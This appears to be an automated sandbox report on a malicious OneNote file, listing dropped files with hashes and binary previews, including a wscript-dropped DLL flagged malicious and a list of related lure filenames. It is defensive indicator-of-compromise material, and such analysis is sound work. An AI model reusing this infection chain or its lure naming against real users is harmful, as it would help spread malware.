File Type:	PNG image data, 85 x 470, 8-bit colormap, non-interlaced
Category:	dropped
Size (bytes):	11197
Entropy (8bit):	7.975073010774664
Encrypted:	false
SSDEEP:	192:p9wNdtRKcVHso6zsqm06xaqZdingVzLZ7/PGSIz/yycRTbChh/JzhbEx15RGb:mdtMcVHqgAqTinMzLZ7/uSIz/yTR/mhF
MD5:	DDC3CC30794277500EFE4BC6667EC123
SHA1:	EFC9642C1F95B5FC38764476AE481649C016FA0C
SHA-256:	7F5B660A1A0BF46C75AAF19B4F77A0E086DE003EC03AFC1F58D871D55AA5BA9E
SHA-512:	25232A84604C3959634D33090238FEC8D51E40AD84EB3A08BB8522A81BE1E83378649C014E98E1DFCDF46B7BFAC92D8D2429211CD11D7EE0334C9C3DF7C1B6A6
Malicious:	false
Preview:	.PNG........IHDR...U.........1x5.....PLTE....................................e........................................................s...............x..........................o..............................................................................................................................................................~.............................m...............................................j...............................................p.......z......................................................x..............\|........................................v.......................y..........................................................h...........................................................................P..{....bKGD....H....cmPPJCmp0712....H.s...(SIDATx^.}i@S..N....h...!..)....AI%..p.L."a..)..`U..,h..:O.b.:.j+.Z).b..zN.s..{O...&\|..N}...${....~.....k}.[k}{.o^.D_..W:35ly..7rL....6n0.A...b

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\000000BB.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 88 x 574, 8-bit colormap, non-interlaced
Category:	dropped
Size (bytes):	19920
Entropy (8bit):	7.987696084459766
Encrypted:	false
SSDEEP:	384:DRSgtAxJx7bzvAsVSqQElOT4uHmpmvNYT9aPU+QtsC2LgfIqJZnbeyRB:DsgaN7bzvAsVdK4uGQFUZ6bU/p3
MD5:	1BDAD9B3B6DE549162F9567697389E1C
SHA1:	5D9C09159F07A3A9BDCC6C4B9BD9CB72D0184E6F
SHA-256:	0908A4CFA23F93011176D47F45843E9CA2973030421996E8E27484781F54B0EC
SHA-512:	475040779AC247BB5C3E11862FB55FBDDFA12D759EE86A33E11BC1F3B656D6CD0F9B25146C0113E43E1D8001D8867D3BC3BF7E6FE21F3A0016CB1F8B70B7A15A
Malicious:	false
Preview:	.PNG........IHDR...X...>......y=h....PLTE..................................t........iw..............................................._n\|...Tds...ky......................................................p~.....................................................dr.................v.............................................n{.......ap}..........x.....z...................u......................\|..Vfu............r.....w........................................~...................Zjx...................................Yiw............w..\|....................Xgv{.....y...........................jx..............\lz.........}..z.....t..[ky........u..y.....gu................................{..........}.....u....................~...........y....r.....bKGD....H....cmPPJCmp0712....H.s...JfIDATx^...\.W./.}....Sy...(..4....D.-.....H...% .$"D.Qr.......`..;...6...N......s...^...L.....Y{.GQU`..~...j....{...-Ax.K..&.....F..I\i..

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\000000BD.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
Category:	dropped
Size (bytes):	179460
Entropy (8bit):	7.979020171518325
Encrypted:	false
SSDEEP:	3072:oiKXvL7lv0am/R1vrdH+9dK6zPQ6bbnGDpcGGDNMIOIMAT8q9Vc02Q57S4A+vMFz:+vlvC/HvgA6fGqGGJlO1qZ71W6CzDn
MD5:	4E131DBFEC5C2462273CA7B35675B9D9
SHA1:	CA037F444D819A118AC37D7AA3782B9BF94C1616
SHA-256:	2A4A3530D652E227DDD5ADC096A95F6034718F7C380B07DB622022D768815059
SHA-512:	C333ECEB1439D0238BF44FB7896E62DBA4C645B70413AA0F99C1F10E8DCD20C2EEE5C83F2E9DDE9A2494C85A6D8D13CFFFC4160E2F598E17867015F5244D656A
Malicious:	false
Preview:	......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d.............................................................................................!.1AQ.aq...".....2Rr..Bb..#34.....CSs.$5c.t....%.Dd.6.T..u.U....E.7w........................!.1A.Qaq......2."r.3....BRb.#4......CsSc...$.5..%.DT.t67d..Uu...'............?..c.......p..z..i.....z......kj........F>f......3N...M....RM.&..-.~.Q..'.....q.a..w...-~......g.{..&.......V.n.D....>FS!n.....@..)...W..q..Wr{..J.gf.{.M$.P@m.,..9..&m.D...w.._...-.O........s.....h.k~......(.K...V..l.-...+.9.k............#.p#.O..9M..mF...C.......7+.AI....4vw.;..H......e..Q.u[.eUK.....z.....[.Kt...s..Lf.4..l{.....sh.............=..;..iqkj.m.a...NH......v..H..$..q.y......c...U[Mcf.......+...S-...^....4..T..YtL.x.v.;.....<...Ik\|B.$.s8......3.+.8.l.. h.:....%B..W..I.QRS..,x.

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\000000BF.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
Category:	dropped
Size (bytes):	109698
Entropy (8bit):	7.954100577911302
Encrypted:	false
SSDEEP:	3072:rDlmvIWr0aRtNCfShCWBxyCHMlcVG0Ezy4FR:rDliIfot8ahCWBcCHDVwR
MD5:	8D804A60E86627383BED6280ED62F1CF
SHA1:	E23FF14B10AD0762DD67FBA3CD6EFC85647C0384
SHA-256:	494547E566FB7A63DD429EB0699FE41AA8998F8EA2F758D813FE3D56C3075719
SHA-512:	0FB19F3D00159F2748C3A54E952E551B9FEA6910D67A54DECA8D099992E50383EADB92768FF1F75CFFAE82A7A157B1E0F77A2F0BE7EC64FD2324304FDCA46577
Malicious:	false
Preview:	......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d...............................................................................................!"#.123..AQB$..aq.RCS...b..c4%..rs..D&....5E6'..TdUte...u.....FV...7.......................!"..1A2B..QaqR.#.br3.........C%...$5.....c4U..Eeu&SsD.6T..................?.....O.C.....^..R<A.g...[....3.....r.0.....nX.S....}...[.?Z.....A.?..~~I..rY\|N.o...9......!...o7r../-.y...'5.3.U.s".-.0.1......SS...&.Q.j.*.$m.e..:x....`}...EP.?.7..~G(so.......O.....z.N..<....~^a.e...........p9.?<._..\|......~.<@.D.9..G..?.?z.y?z.C.U.w..[.,..A.+........s......g...G.^....pz.xY.....d8.y.X...P..O(A.O..~:._.......<...o..4s..^.^b..x......_a.....\|{c...:..X.....}.._...[?..NK.c...}.<......H.G....+x.Z..\|....n...o....`.nk.#.%x......-\|...\|7......N!=././..w.8x.".8....'x........w...,>....j[w8a..}..lS..?.

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\000000BH.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
Category:	dropped
Size (bytes):	41893
Entropy (8bit):	7.52654558351485
Encrypted:	false
SSDEEP:	768:pZvVQkUbOHxx3pvVmO5rsP5gUdXwFMuv53knzyncaXgRDqPU:pZkijV5wScXwFMYknzucaXgRyU
MD5:	F25427EFECFEE786D5A9F630726DD140
SHA1:	BC612A86FF985AB569ED1A1EA5FFC4FDB18FC605
SHA-256:	5A36960DF32817E8426BD40A88F88B04FB55B84BAEF60F1E71E0872217FDB134
SHA-512:	B102F34385196D630F198667E874F25ADBC737426FDAE0747EC799B33632E5DC92999C7C715DC84D904342738930267AB1709870BDAA842243E4C283FE5E1554
Malicious:	false
Preview:	......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d...........................................................................................!.1AQ....aq......"......2...Xx..9BRr#.b3$..&..g.8....%F'G.(H.Ss..D5E..v..W..Cc.deu..7w.h.).....................!.1....A..Qaq...Ttu.6..."R..5...2B..S....bcs.Dd%&r3C...#$...Ue.............?..R...%.R...t.MQ.l...v...V]..n...Zw....M....4..F.&&bb0.:]l......ay.r<..3.l.Q^.........I54.N2.8..2s...w..r6.......[1Zh....O...9..>...B......x]...r.\.\..v..~....y.QT.3.......=....r..}.l.....o;....M..C1....w)...+o1f.]...MoA.E..s5..i.\....miGsy..m\.Zj....I'YU.\tU6La5v.>.K..m.]1.......k..0....</5v.V7lY.e.vV.+./[....f..u{....s.}.Rb.Z.....Y.6]..m....V.\...Mr.=r...K...l..%..m^.......X.(..fG..[Fly.jL.a4..vs..o.e..q.9km..w1.yg.....r_.*h.n..5i.-.{Y.l...<...'Or.s..Z....../JP.....\FV.S..............m

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\000000BK.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop CS Windows, datetime=2004:03:12 11:05:55], progressive, precision 8, 612x618, components 3
Category:	dropped
Size (bytes):	68633
Entropy (8bit):	7.709776384921022
Encrypted:	false
SSDEEP:	1536:tapXpSTJDOkFGdJdBk/slsbfsw1imaapnbvD8:U2OjJr6b07m1bvD8
MD5:	41241EE59AB7BC9EB34784E3BCE31CB4
SHA1:	98680761A51E9199CF3C89F68B5309FBEC7EE3CB
SHA-256:	035B26DF61855A3F36DBD30FDAB0C157C04C9E8AE2197EA4D4AEB3E82E6A4C2B
SHA-512:	3EE331D5BCEE4AD5D3FC9661D4AB4053F7D351591A094334F963C33C9D0E32CCCABE9334AD7C308108CE99617E064FE848DCD469ACD8D83FBE5C4452DE523D8F
Malicious:	false
Preview:	......JFIF.....H.H......Exif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop CS Windows.2004:03:12 11:05:55.............................d...........j...........................................&.(.........................................H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d......................................................................................................................................................"................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?../$.W:SZ./...9.....-...u......r.....].c...@W_.7...+......v.+PD.I..-<1.pDn-\.....p.$....0.}V....\..>.~..XN.o..l(E....ik..o.

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\000000BM.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop CS Windows, datetime=2004:03:12 11:08:07], baseline, precision 8, 595x450, components 3
Category:	dropped
Size (bytes):	59832
Entropy (8bit):	7.308211468398169
Encrypted:	false
SSDEEP:	1536:HS9SYFtN0+CRa9mfJy4zBAiIJhzrkHDV2hJK:yAmta+Tyy4zBIJW5WK
MD5:	DCDD543A4E0BA2C1909BA095D46FFBCB
SHA1:	B86C89537138FE07255354202D3EAD0B53B3C54D
SHA-256:	28F334B77068F71F5F92A95695433B950610204A0E5580CE567DB8FAD4993ECB
SHA-512:	5408C3259B7F3288A4BEB04342799AD5FE3A6F0EC7E92353B29B7E7E538DFA9903B39637226919E0421BC422635D25F5F8069DC7441864DC03E1B909BF5C2C84
Malicious:	false
Preview:	......JFIF.....H.H.....fExif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop CS Windows.2004:03:12 11:08:07.............................S.......................................................&.(.................................0.......H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d.................................................................................................................................................y...."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?......;R~+'....xh..~.n-}.......Te................^B..IU_....._...S......h.......!....9...A}6V=J......C..c.....Ug.Wh......

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\000000BO.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
Category:	modified
Size (bytes):	53259
Entropy (8bit):	7.651662052139301
Encrypted:	false
SSDEEP:	768:dCiCBBenRYWDBCipMYGTbYGLHbXxoP/qEF+MU50qyJ30h2W474S/Aq/xc4674bi5:dCiIQXBCiwbDLHD0/sFyVel4Pi4UgE
MD5:	2EE369ABB7936F8C28FF0ABDD224EA05
SHA1:	FE9D304A7B49E31EAE439369ABC548E265149636
SHA-256:	FB12D59B8BE911247BBAFDD416852E8B74B028005A141CB4DBBBA109B4B6ED2C
SHA-512:	5CF396CA472C32AE988600176114106CB1619404DD899A3867A5AB43DC90583B771EF69B14EF50E56A21F038BF51D8463C6ADD2DE9D4CB523F6290E24A4DECB3
Malicious:	false
Preview:	......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d............................................................................................!1..AQa....q........"2..R..Bbr..#S....3$.....C.4v..(X.DtEUV.....cs..Td.5uf'Wgw8Hh........................!1Q.Aa....q.2...."R...r..3.t..U...B#S.4ub..C$d.5Ee&'7c.D%sT..............?.....?...k,lk^...M".Yo5.Qp.&s}b.m.:...W.x}..a......N1..d-n.-..^..b..TZ.W..."....F....^......ve5...^...2.:i...........~u2pK.z./&..u..L[I....Y....@y{\|>..MN=:....Q[..H....a........\|%..4fV....).....^.9b.f...F...p.=.W...aZ.........Z.t.n.....z3..[..lVh..\.N-.._.sK.y.._e.G.jig.a.7^....u....p.5.a.].........u/u..D.yl.XA..f.z..~.x.....N.....b=.uv.2.t.'.N.-.H..n.v.a.A[.Z.....T2...._...:....h..l.E..sm..a.3I...RE...fWb.Ek.0.#.)..Y#T...........u{....U....s.].7_H.2.`O6...P......}..4LR....]4.mid...

C:\Users\user\AppData\Local\Temp\OneNote Archive\Getting Started.one

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	362512
Entropy (8bit):	7.486506731429872
Encrypted:	false
SSDEEP:	6144:nyHwh4AIZ5A1QM6vUbHCkCBVoqx5HUvFOAjNPySj8MTcrOQMhuNBSMl:NWZ5A10vUbikCBVoqx5wOuqSJTcOQMZE
MD5:	89CBEB513A5A7AE964F2A34009B44855
SHA1:	9BDBE991504F457A1C534B7C6ED33A36F702121A
SHA-256:	13247260C8C50A108B2E3594FCC4E6463DCCF5824CABCB3D0C4EEAD080F56328
SHA-512:	D2F32A7715E0B014491A19D5C0BA81628DAB38DDCA8FBF718F8679F755B9A91513E9829B79DBD8A2821942FC8E06FB3C66DB13167CB505B9BF2B8054A34A26B9
Malicious:	false
Preview:	.R\{..M..Sx.)..(....E4D......<................?.....I...................................................................s...[v_N..NG.Q...d(.x...........(~......................8.......0..........................D.p.jB.*.w........@.....E..&.K..0............................U....7..U....7..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\OneNote Archive\Open Notebook.onetoc2

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	5136
Entropy (8bit):	2.778578015444839
Encrypted:	false
SSDEEP:	48:wTnR/uUPv4om1mAlthbXxtvKqyuacdAac3:wenrDVt8uaBaq
MD5:	069D936B203F4D8B565E6BBFFD6FE2D4
SHA1:	62BC6EDE1F04D9145D4987014EC31627843E4CD7
SHA-256:	60153DD22648CC4E6C3093B0703A34AE68943770DAE74F42D59E4EDAE5BF9585
SHA-512:	7DCF94E79043A128FFF064F412C82B5EDC8F76ABA181C3046F8FCF6E8EF46D1004F69FEF0670EF8F016BE584CAF9073A7FBDDDBFBFA41E31370C9288C9485CC6
Malicious:	false
Preview:	./.C..vL....W"v_s...[v_N..NG.Q..................?.....I.................................................................................................................................................................I..z.h.!.........[_n.r..M.moC.d].............................r....7..r....7..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\OneNote15WatsonLog.etl

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	16384
Entropy (8bit):	0.3302320858281373
Encrypted:	false
SSDEEP:	12:sDTmqLyaq9995VOIMdb+2kXg1Q137v+uxfn:sDPLya8CclL+ef
MD5:	01CA402B7B413D4398A0148740335DC3
SHA1:	B03DFB7555EDEEDDBDE1CFADA508D9BA92F1A229
SHA-256:	44BD10ADA3CD3DA52EC0D5141227446E5DEBFA38996DE3A0C9CFFCA337BCBAFE
SHA-512:	14A157C7627EBFD13A308E04206AD3541509BBBA21E9CE07B1ABA9333E11E49A1705FE77FE59D595E48D2DB21B87F42CAE2F67773896E43165580C8E72C32B30
Malicious:	false
Preview:	.@..h...........................................h.......................................u.+..............@.......B..............Zb..........................................@.t.z.r.e.s...d.l.l.,.-.2.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.2.1.1............................................................u.C...... ..........X..........O.n.e.N.o.t.e. .W.a.t.s.o.n. .L.o.g...C.:.\.U.s.e.r.s.\.f.r.o.n.t.d.e.s.k.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.O.n.e.N.o.t.e.1.5.W.a.t.s.o.n.L.o.g...e.t.l.......P.P..........P,.............................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\click.wsf

Download File

Process:	C:\Windows\SysWOW64\wscript.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	9
Entropy (8bit):	2.94770277922009
Encrypted:	false
SSDEEP:	3:tWn:tWn
MD5:	07F5A0CFFD9B2616EA44FB90CCC04480
SHA1:	641B12C5FFA1A31BC367390E34D441A9CE1958EE
SHA-256:	A0430A038E7D879375C9CA5BF94CB440A3B9A002712118A7BCCC1FF82F1EA896
SHA-512:	09E7488C138DEAD45343A79AD0CB37036C5444606CDFD8AA859EE70227A96964376A17F07E03D0FC353708CA9AAF979ABF8BC917E6C2D005A0052575E074F531
Malicious:	true
Preview:	badum tss

C:\Users\user\AppData\Local\Temp\rad16F69.tmp.dll

Download File

Process:	C:\Windows\SysWOW64\wscript.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	316928
Entropy (8bit):	7.337848702590508
Encrypted:	false
SSDEEP:	6144:cwNQMQTlfdUPABVy559hhR3iP7TfPYbrF1EFVw0todxKROsCt:rNbadDBkZ6rPeEFizdxxsCt
MD5:	BFC060937DC90B273ECCB6825145F298
SHA1:	C156C00C7E918F0CB7363614FB1F177C90D8108A
SHA-256:	2F39C2879989DDD7F9ECF52B6232598E5595F8BF367846FF188C9DFBF1251253
SHA-512:	CC1FEE19314B0A0F9E292FA84F6E98F087033D77DB937848DDA1DA0C88F49997866CBA5465DF04BF929B810B42FDB81481341064C4565C9B6272FA7F3B473AC5
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 58%
Joe Sandbox View:	Filename: OMICS_Online_1.one, Detection: malicious, Browse Filename: Insight_Medical_Publishing.one, Detection: malicious, Browse Filename: Omics_Journal.one, Detection: malicious, Browse Filename: OMICS.one, Detection: malicious, Browse Filename: OPAST_GROUP_1.one, Detection: malicious, Browse Filename: OPAST_GROUP_LLC.one, Detection: malicious, Browse Filename: OPAST_GROUP.one, Detection: malicious, Browse Filename: Opast_International.one, Detection: malicious, Browse Filename: opastonline.com.one, Detection: malicious, Browse Filename: Opast_Publishing_Group_1.one, Detection: malicious, Browse Filename: Opast_Publishing_Group.one, Detection: malicious, Browse Filename: omicsonline.net.one, Detection: malicious, Browse Filename: report_03_16_2023.one, Detection: malicious, Browse Filename: 2023-03-16_0923.one, Detection: malicious, Browse Filename: report_03_16_2023.one, Detection: malicious, Browse Filename: 100935929722734787.one, Detection: malicious, Browse Filename: NG7553084292252526_202303161746.one, Detection: malicious, Browse Filename: 2023-03-16_1753.one, Detection: malicious, Browse Filename: PUV026949243199756981_202303161748.one, Detection: malicious, Browse Filename: 355444649229343017.one, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......L`.=...n...n...nCy.o...nCy.o...nCy.o...n.z.o(..n.z.o...n.z.o...nCy.o...n...nq..n.z.o...n.z.o...n.zsn...n...n...n.z.o...nRich...n................PE..d....6.d.........." ...!.F...................................................0............ .............................................T...d...d....`..(....0............... ..........8...........................p...@............`..`............................text....D.......F.................. ..`.rdata.......`.......J..............@..@.data...............................@....pdata.......0......................@..@_RDATA..\....P......................@..@.rsrc...(....`......................@..@.reloc....... ......................@..B........................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\{00B4667A-0009-4CAE-8232-1BCB0342810E}.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 165 x 131, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	3679
Entropy (8bit):	7.931319059366604
Encrypted:	false
SSDEEP:	96:tT+LtoQ9jsUBsnwlDGThUe8ww2iJiGEjdKKnnE+Gh:V+Ltt5GwlDQhUe8ww2iJi7MKnnE+K
MD5:	995CEACAD563F849C4142B6A6F29F081
SHA1:	44CB3B867CD2917541B7D5AAED2F14F10FEBB0FD
SHA-256:	3691FB8C60EA1B827092F05FBB1807E34726016C6FF56698D7B81C44D519D22A
SHA-512:	3C8EFEB966B075D06D8344483352BF92C9292F9970C9377BE254EB355EFAF017916737AECCDC704B84D532B7229F9908951A6F2CC3FAD810791CAB224401AD3D
Malicious:	false
Preview:	.PNG........IHDR.............c.L.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^....W...Gh...k.Hm..J.m....,X...Eh..%.n.....PHvy$%...[...R..l...(/..-..yl..Z.h..H!.../.\|.y\|w...7d3s.s.=.{.s.g.6W.^..)..@..{..'O.LL.......c.^.6xS&O.,...J.(\|?...............,.$......@.zk....,.$.........)..7]O...mH7..0..\|..&j..t..F...T...AZ7z.....$H...AZ7z.....$H...AZ7z.....$H...AZ7z.....$H....W.6.....0...FTcc.Wi....Q)...<......{...#G....Y.f....KKK..,,,4.....{S.`...+O.[..+.\H...(.<..Qy..ET.PM...c....~(.g..*...ol.K......Sc8..q.F.KM"<...:t.O.>b..$t..].........2..y.h."!f.08hT..m.(..C.7n.......@....SVUU).F.).X\\....[j.U....$x$d..e...<.W......=;0L78t+..Gw..-....]......C7......K.w..._..g......A.&M.$^.#.!....e.\.P........;vD..@...Za.@D..f...! .2w...4#.J..c....K}....F.u.I.b.V2.k...5..`............M..!.,.;.E..BZ....K..[7....5....,...........K...7+.6..o....\,`...z..5x...\46x.b......Y....s.^.x=.e.4s.W..t,.iu.G^.....(74....`.....:......]..&..j+t9..3..}..

C:\Users\user\AppData\Local\Temp\{00BB475B-3E13-4BDA-987F-4DA83EF10A95}.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	16003
Entropy (8bit):	7.959532793770661
Encrypted:	false
SSDEEP:	384:1l+zN+iNurNE/tBdEC/vkape2XHYdhOm+Bl6C4:L+zN+iNurGNEC3fpe2X8Pa+
MD5:	3A5CD52E925A7C4A345047D8F06C3C41
SHA1:	9C02828D83206BBD3EB58930C8C65A6CA5DBCF40
SHA-256:	477277E8CAAAE1D3B3EAB5B3660239AEEABC433743A191727B1A71E529872AC7
SHA-512:	8D8B6AC645ECC7C8BD374E6190819006C71AC0B5993419C42463009116214E5EC4B4235D94B4AE4CDA132E7DDA9807ADC51525824AC5F12696517FFC8890891E
Malicious:	false
Preview:	.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..>.IDATx^..\|.....+)..H..C.K... ....x).rU..T..E...;.....@Z.....@...9q.g7[fgggg.............1//.."@....0..#.t..f.C..."@.....@OIR.#P...0..$...y.Pl"@....( @zJ]...." ...Si8RD.....S..D....i...J.R!.D....R. .D..HC..T..... .D...... .D@.....p.T... ........ ... =..#.B.... =.>@........4.)."@....).."@...4.HO..H..."@.HO...."@..!@z.GJ...."@zJ}...." ...Si8RD.....S..D....i...J.R!.D....R. .D..HC..T..... .D...... .D@.....y.?.`.T... .f.P...$47........~E....!.D..X............].`....0..N.a...>[\|\|...t.T.w .. .....)'...=X?c.......+OE....<-84...=.....w.8...7.Ro&.D@!...GS.....s.......:...Gg..8..T...u...~..............<...S...../Y.......W........#. .vB...u.. .+.999YYY......wf..._.{6....=..]>Y?..;=02eb......2...;.%..\...P..R5....XMO.....6....W]...3g.5;.n{t.......F7S....r...[n.......AAX..j[.j.;.neef).2.....{ ..r..{7.-........i..S........<..pm.u.V....M.333....K..Mr.s..Ek..=t_.#.P...

C:\Users\user\AppData\Local\Temp\{01453947-2F7B-4D67-806C-DA8607230B17}

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
Category:	dropped
Size (bytes):	39010
Entropy (8bit):	7.362726513389497
Encrypted:	false
SSDEEP:	768:6tCjwO+E+KW0ZtOgepcoWW4pAWQ6/KWcR474HOAZaDfK:68j+E+KW0HOgep/72/NKWcRNefK
MD5:	9700DE02720CDB5A45EDE51F1A4647EC
SHA1:	CF72A73E1181719B1CC45C2FE0A6B619081E115E
SHA-256:	7E6A7714A69688D9FFDF16AA942B66064A0C77FCD9B3E469F89730B4B9290C3E
SHA-512:	5438921467D62376472007B9EBF3C35C9D9FE3EDE04D99A990129332D53EBC8EE2555C0319A4F7C0DF63516F29CEDF2171D8B6DC34C9FCD075C2CA41EB728660
Malicious:	false
Preview:	......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d.........................................................................................!1..A...Qaq..".......2BR#...b%&6..'w.r.3f7W8.s5EUeF.g....CS$4.Vv..Tdt..G..(c..u.Hhx.......................!1.AQa..2.q....".s...3.4BRr.#......b.$c............?........uf.....t...;..[...W.h.....-.k.f..i.u..KQ..b.F...rM%/.8n.S..=9.....G$O;.f.}L..N..U._i.[.X...3.~....S.~..+t$...c.5......{..X/..#.G...}s....6......^....o~.$.\WA?...^*w[O.~..6..~....a....~..:..0.......{O...\|.s.u._w.........i...........{K...._.?.../{.....A..8....<g.iu..<..................X......\|]v....D..9.k.w.\|-IF.Tv.-.&.........."'.4.b....z.._.Z.....G...u.xyt./_.q..m>..S.V.Xdc.bw.T.W......g..........}s.._..?....U]_.......`......>.\|'.~xH....,...?........?.q....o../..R..;...Y.G....A"?......?.<..1...w..o.M.........tco.

C:\Users\user\AppData\Local\Temp\{02A24394-14D3-4113-91C0-61849D4F69F0}.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 165 x 131, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	3679
Entropy (8bit):	7.931319059366604
Encrypted:	false
SSDEEP:	96:tT+LtoQ9jsUBsnwlDGThUe8ww2iJiGEjdKKnnE+Gh:V+Ltt5GwlDQhUe8ww2iJi7MKnnE+K
MD5:	995CEACAD563F849C4142B6A6F29F081
SHA1:	44CB3B867CD2917541B7D5AAED2F14F10FEBB0FD
SHA-256:	3691FB8C60EA1B827092F05FBB1807E34726016C6FF56698D7B81C44D519D22A
SHA-512:	3C8EFEB966B075D06D8344483352BF92C9292F9970C9377BE254EB355EFAF017916737AECCDC704B84D532B7229F9908951A6F2CC3FAD810791CAB224401AD3D
Malicious:	false
Preview:	.PNG........IHDR.............c.L.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^....W...Gh...k.Hm..J.m....,X...Eh..%.n.....PHvy$%...[...R..l...(/..-..yl..Z.h..H!.../.\|.y\|w...7d3s.s.=.{.s.g.6W.^..)..@..{..'O.LL.......c.^.6xS&O.,...J.(\|?...............,.$......@.zk....,.$.........)..7]O...mH7..0..\|..&j..t..F...T...AZ7z.....$H...AZ7z.....$H...AZ7z.....$H...AZ7z.....$H....W.6.....0...FTcc.Wi....Q)...<......{...#G....Y.f....KKK..,,,4.....{S.`...+O.[..+.\H...(.<..Qy..ET.PM...c....~(.g..*...ol.K......Sc8..q.F.KM"<...:t.O.>b..$t..].........2..y.h."!f.08hT..m.(..C.7n.......@....SVUU).F.).X\\....[j.U....$x$d..e...<.W......=;0L78t+..Gw..-....]......C7......K.w..._..g......A.&M.$^.#.!....e.\.P........;vD..@...Za.@D..f...! .2w...4#.J..c....K}....F.u.I.b.V2.k...5..`............M..!.,.;.E..BZ....K..[7....5....,...........K...7+.6..o....\,`...z..5x...\46x.b......Y....s.^.x=.e.4s.W..t,.iu.G^.....(74....`.....:......]..&..j+t9..3..}..

C:\Users\user\AppData\Local\Temp\{035C665B-D14F-4CAA-BE51-D1F05704AF90}

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop 7.0, datetime=2004:03:04 13:27:10], progressive, precision 8, 102x792, components 3
Category:	dropped
Size (bytes):	52912
